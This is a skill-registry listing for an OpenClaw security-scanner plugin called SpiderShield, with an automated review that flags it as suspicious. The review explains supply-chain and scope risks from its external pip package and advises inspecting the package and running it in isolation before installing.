Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
SpiderShield Security Scanner
v0.3.0Security scanning and trust scoring for OpenClaw skills with commands for trust lookup, malware detection, config audit and auto-fix, rug pull detection, and...
⭐ 0· 79·0 current·0 all-time
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
Name, description, commands, and declared permissions match a security scanner that audits OpenClaw config, pins content hashes, and queries a trust API. The scripts only call a 'spidershield' CLI / module (or curl to api.spiderrating.com for /check), and they read/write ~/.openclaw and ~/.spidershield as expected for audit/fix/pin operations. This is proportionate to the stated purpose.
Instruction Scope
The SKILL.md and bundled scripts are wrappers that delegate real work to an external 'spidershield' Python package (spidershield CLI or python3 -m spidershield). The wrappers access local config paths (~/.openclaw, ~/.spidershield) and will prompt before writing for fixes, which matches intent. However the SKILL.md asserts the local commands run "entirely locally"; that is only true if the external spidershield package behaves; the wrappers themselves make no effort to constrain network access or inspect what the installed package will do. Because the skill will execute third-party code on the user's machine, this is a scope risk (possible exfiltration, remote network calls, or arbitrary changes executed by the installed package).
Install Mechanism
There is no packaged install spec in the registry bundle — users are told to run 'pip install spidershield'. Installing and executing a PyPI package is the primary install path. That is a supply-chain risk: the package could contain arbitrary code, run with the user's privileges, and perform network I/O or modify files. The skill points to a GitHub repo (https://github.com/teehooai/spidershield) which helps review, but the registry does not vendor or pin the package or verify its origin. This elevates risk compared with an instruction-only wrapper that uses only built-in tools.
Credentials
The skill does not request environment variables or credentials in the manifest. It legitimately reads and may write OpenClaw config (~/.openclaw/) and stores pins under ~/.spidershield/, which aligns with its features. The proportionality concern is indirect: the external spidershield package (not included) could request credentials or read other files — the wrapper gives it that opportunity by invoking it.
Persistence & Privilege
The skill is not 'always:true' and does not request unusual system-wide privileges. It will create/use ~/.spidershield/ for pin data and may modify ~/.openclaw/ during 'fix' (with an explicit user confirmation prompt in the script). Autonomous invocation is allowed by default (disable-model-invocation: false) — combined with the install-time execution of an external package, that increases blast radius but is not itself proof of malicious intent.
What to consider before installing
This skill is a set of bash wrappers that call an external Python package (spidershield) or the SpiderRating API. The main risk is the external pip package: when you run 'pip install spidershield' the package's code will execute locally with your user privileges and could contact remote servers or modify files (including ~/.openclaw/). Before installing or running the local scan/fix/pin commands, do one or more of the following: 1) Inspect the spidershield package source at the referenced GitHub repo (https://github.com/teehooai/spidershield) or PyPI package code to verify it only does what you expect; 2) Prefer using the read-only /spidershield check command which only sends an author/skill slug to api.spiderrating.com (as documented) instead of installing the CLI; 3) Run 'pip install' in an isolated environment (virtualenv or throwaway container) and review the installed package before allowing it to access your real ~/.openclaw/; 4) If you need to run 'fix', use --dry-run first and back up ~/.openclaw/ before accepting changes; 5) Consider verifying the pip package's integrity (signed release, pinned version, or checksum) and the maintainers' reputation. If you cannot audit the spidershield package, treat installing and running the local commands as higher risk.Like a lobster shell, security has layers — review code before you run it.
latestvk972dd05dypvcg1d6b9c9mv4en839zn2
License
MIT-0
Free to use, modify, and redistribute. No attribution required.